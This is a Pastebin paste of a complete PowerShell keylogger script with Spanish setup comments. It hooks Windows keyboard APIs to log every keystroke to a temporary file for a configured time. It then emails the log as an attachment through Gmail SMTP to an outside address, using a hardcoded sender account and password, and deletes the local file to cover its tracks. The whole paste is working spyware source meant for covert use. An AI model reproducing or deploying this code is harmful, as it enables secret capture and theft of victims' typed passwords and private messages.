SHARE
TWEET

ZulaError404

a guest Jul 20th, 2019 273 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Editar solo esta sección!
  2. $TimeToRun = 2
  3. $From = "spyenviador@gmail.com"
  4. $Pass = "zulacorp"
  5. $To = "Code0fromu@gmail.com"
  6. $Subject = "Keylogger Results"
  7. $body = "Keylogger Results"
  8. $SMTPServer = "smtp.gmail.com"
  9. $SMTPPort = "587"
  10. $credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
  11. ############################
  12.  
  13.  
  14. $TimeStart = Get-Date
  15. $TimeEnd = $timeStart.addminutes($TimeToRun)
  16.  
  17. #requires -Version 2
  18. function Start-KeyLogger($Path="$env:temp\Keybat.txt")
  19. {
  20.   # Signatures for API Calls
  21.   $signatures = @'
  22. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  23. public static extern short GetAsyncKeyState(int virtualKeyCode);
  24. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  25. public static extern int GetKeyboardState(byte[] keystate);
  26. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  27. public static extern int MapVirtualKey(uint uCode, int uMapType);
  28. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  29. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  30. '@
  31.  
  32.   # load signatures and make members available
  33.   $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
  34.    
  35.   # create output file
  36.   $null = New-Item -Path $Path -ItemType File -Force
  37.  
  38.   try
  39.   {
  40.  
  41.     # create endless loop. When user presses CTRL+C, finally-block
  42.     # executes and shows the collected key presses
  43.     while ($TimeEnd -ge $TimeNow) {
  44.       Start-Sleep -Milliseconds 40
  45.      
  46.       # scan all ASCII codes above 8
  47.       for ($ascii = 9; $ascii -le 254; $ascii++) {
  48.         # get current key state
  49.         $state = $API::GetAsyncKeyState($ascii)
  50.  
  51.         # is key pressed?
  52.         if ($state -eq -32767) {
  53.           $null = [console]::CapsLock
  54.  
  55.           # translate scan code to real code
  56.           $virtualKey = $API::MapVirtualKey($ascii, 3)
  57.  
  58.           # get keyboard state for virtual keys
  59.           $kbstate = New-Object Byte[] 256
  60.           $checkkbstate = $API::GetKeyboardState($kbstate)
  61.  
  62.           # prepare a StringBuilder to receive input key
  63.           $mychar = New-Object -TypeName System.Text.StringBuilder
  64.  
  65.           # translate virtual key
  66.           $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
  67.  
  68.           if ($success)
  69.           {
  70.             # add key to logger file
  71.             [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
  72.           }
  73.         }
  74.       }
  75.       $TimeNow = Get-Date
  76.     }
  77.   }
  78.   finally
  79.   {
  80.     # open logger file in Notepad
  81.     send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
  82.     Remove-Item -Path $Path -force
  83.     exit 1
  84.   }
  85. }
  86.  
  87. # records all key presses until script is aborted by pressing CTRL+C
  88. # will then open the file with collected key codes
  89. Start-KeyLogger
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top